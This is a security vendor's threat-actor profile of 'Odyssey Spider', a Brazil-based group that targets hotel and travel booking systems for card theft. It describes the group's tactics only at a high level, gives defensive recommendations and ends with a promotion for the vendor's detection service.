Threat Actor Profile
Odyssey Spider
Odyssey Spider is a financially motivated eCrime adversary first observed in operations as early as late 2018. Known for their sophisticated tactics targeting the hospitality and travel sectors, this group focuses on stealing credit card information during reservation and booking processes. Operating primarily from Brazil, their foothold extends across Latin America and parts of Southwestern Europe, exhibiting increasingly complex methods with each campaign.
Threat Actor Profile
Odyssey Spider
Country of Origin
Odyssey Spider is believed to originate from Brazil. Multiple indicators, such as their use of regionally relevant phishing lures and their primary focus on LATAM organizations, strongly suggest Brazil as their base of operations.
Members
The exact size of Odyssey Spider remains uncertain. However, given the breadth of their campaigns and the increasing sophistication of their custom malware tools, it is likely a mid-sized group of individuals with specialized skills in scripting, malware deployment, and infrastructure management.
Leadership
At this time, the identities or aliases of Odyssey Spider's leadership remain unknown. The group's coordinated and sustained activity implies a structured organization, but no public-facing information has been revealed.
Odyssey Spider TTPs
Odyssey Spider's tactics, techniques, and procedures (TTPs) reveal a calculated and targeted approach aimed at financial gain. Below is a breakdown of their known methods:
Tactics
Odyssey Spider primarily aims to steal payment card information during travel and hotel booking processes. Their tactics center around targeting organizations in the hospitality sector and leveraging phishing schemes tailored to those industries.
Techniques
The group uses phishing emails disguised as hotel booking confirmations to gain initial access to victims' systems. They subsequently deploy custom malware, such as Remote Access Trojans (RATs) and screen-capturing tools like CapturaTela, to exfiltrate sensitive data.
Procedures
Odyssey Spider's notable operational methods include:
Phishing campaigns crafted around hotel and travel-themed lures.
Deployment of custom PowerShell and VBScript downloaders.
Usage of a multi-stage loader named Alosh to evade detection.
Obfuscation techniques with tools like the crypter Fsociety.
Exploitation of compromised booking systems to exfiltrate payment card data.
Want to Shut Down Threats Before They Start?
Notable Cyberattacks
A significant attack attributed to Odyssey Spider involved the compromise of a prominent Latin American hotel chain's reservation system, resulting in the theft of thousands of customer credit card details. The group’s tactics leveraged customized phishing emails and advanced obfuscation to execute the breach.
Law Enforcement & Arrests
To date, no known arrests of Odyssey Spider members have been publicly reported. Given their geographical base in Brazil and operations spanning multiple regions, collaboration between international law enforcement agencies will be critical to disrupt their activities.
How to Defend Against Odyssey Spider
Email and Phishing Protections:
Train employees to identify and report phishing attempts with regular and engaging security awareness training.
Enable sandboxing for email attachments and scripts.
Disable unnecessary execution of PowerShell and VBScript by default.
Endpoint and Network Defenses:
Monitor for behaviors associated with foreground script execution and custom loaders like Alosh.
Use malware analysis tools capable of detecting obfuscation techniques.
Web Application Security:
Harden booking management systems against unauthorized file uploads and injected scripts.
Execute regular audits and enforce PCI DSS standards for payment data security.
Huntress's advanced endpoint detection and threat intelligence solutions can assist in identifying and neutralizing Odyssey Spider's activities before they escalate into major breaches.
References
Detect, Respond, Protect
See how the global Huntress SOC can augment your team
with 24/7 coverage and unmatched human expertise.
Start your free trial today.
